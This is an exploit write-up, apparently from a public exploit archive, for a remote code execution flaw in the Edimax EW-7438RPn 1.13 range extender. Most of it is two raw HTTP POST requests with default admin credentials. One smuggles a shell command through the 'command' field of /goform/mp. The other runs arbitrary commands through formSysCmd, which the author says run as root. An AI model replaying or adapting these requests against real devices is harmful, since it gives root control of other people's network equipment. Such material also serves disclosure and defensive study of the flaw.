# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution # Date: 2020-04-23 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ------ NOTE: This device configurated with root permissions. So you can run the command as root Here is the detail(s) of the RCE(s) 1- Content of the mp.asp file
     
RCE Detail: ------------------------------- POST /goform/mp HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 command=||busybox+ls&getID= ------------------------------- 2- Content of the syscmd.asp
This page can be used to run target system command.
RCE Detail: ------------------------------- POST /goform/formSysCmd HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 sysCmd="command to here"
System Command: